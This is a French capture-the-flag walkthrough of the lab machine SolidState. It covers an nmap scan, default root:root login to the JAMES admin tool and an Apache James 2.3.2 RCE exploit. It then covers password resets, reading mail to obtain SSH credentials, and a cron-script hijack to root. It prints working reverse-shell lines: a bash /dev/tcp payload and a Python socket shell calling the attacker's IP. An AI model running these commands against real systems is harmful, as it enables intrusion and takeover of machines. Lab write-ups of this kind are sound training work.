SolidState

JAMES cron

Nom machine : SolidState
Difficulté : Moyenne
OS : Linux

Enumération

NMAP

Nmap scan report for 10.10.10.51
Host is up (0.032s latency).
Not shown: 65529 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.12 [10.10.14.12])
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
110/tcp  open  pop3    JAMES pop3d 2.3.2
119/tcp  open  nntp    JAMES nntpd (posting ok)
4555/tcp open  rsip?
| fingerprint-strings: 
|   GenericLines: 
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for 
|_    Login id:

JAMES Remote Administration Tool 2.3.2

┌──(kali㉿kali)-[~]
└─$ nc -nv 10.10.10.51 4555
(UNKNOWN) [10.10.10.51] 4555 (?) open
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands

root:root fonctionne

Accès initial

Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)Exploit Database

┌──(kali㉿kali)-[~/htb/solid]
└─$ python exploit.py 10.10.10.51 10.10.14.12 1234
[+]Payload Selected (see script for more options):  /bin/bash -i >& /dev/tcp/10.10.14.12/1234 0>&1
[+]Example netcat listener syntax to use after successful execution: nc -lvnp 1234
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).
[+]Don't forget to start a listener on port 1234 before logging in!

Nous l'avons executé et lancer le listeneur qui est en attente.

Nous allons retourner sur le port 4555 avec root:root

listusers
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin

setpassword james password
Password for james reset
setpassword thomas password
Password for thomas reset
setpassword mindy password
Password for mindy reset
setpassword mailadmin password
Password for mailadmin reset

Nous avons listé puis changer les mots de passe utilisateurs. Nous allons voir maintenant si nous pouvons lire des mails avec POP3

┌──(kali㉿kali)-[~]
└─$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
user mindy
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
pass password
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836

retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

┌──(kali㉿kali)-[~]
└─$ ssh mindy@10.10.10.51    
mindy@10.10.10.51's password: 
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
{...}

Le shell est restreint, mais nous avons une réponse sur notre listeneur au port 1234.

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234                    
listening on [any] 1234 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.51] 47986
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)

Elévation des privilèges

Nous allons télécharger pspy32 sur notre cible, ajouter les droits d'exécution puis le lancer.

2024/11/06 05:45:01 CMD: UID=0     PID=2601   | /usr/sbin/CRON -f 
2024/11/06 05:45:01 CMD: UID=0     PID=2602   | /usr/sbin/CRON -f 
2024/11/06 05:45:01 CMD: UID=0     PID=2603   | python /opt/tmp.py 
2024/11/06 05:45:01 CMD: UID=0     PID=2604   | python /opt/tmp.py 
2024/11/06 05:45:01 CMD: UID=0     PID=2605   | sh -c rm -r /tmp/*

Nous allons voir ce que contient le fichier tmp.py

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

Nous avons les droits d'écritures, nous pouvons donc le remplacer par une reverse shell.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
cat tmp.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.12",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

Plus qu'à attendre ...

┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1235                    
listening on [any] 1235 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.51] 37304
root@solidstate:~# whoami
whoami
root

PrécédentPoison SuivantSunday

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagJAMES Remote Administration Tool 2.3.2

hashtagAccès initial

hashtagElévation des privilèges

Enumération

NMAP

JAMES Remote Administration Tool 2.3.2

Accès initial

Elévation des privilèges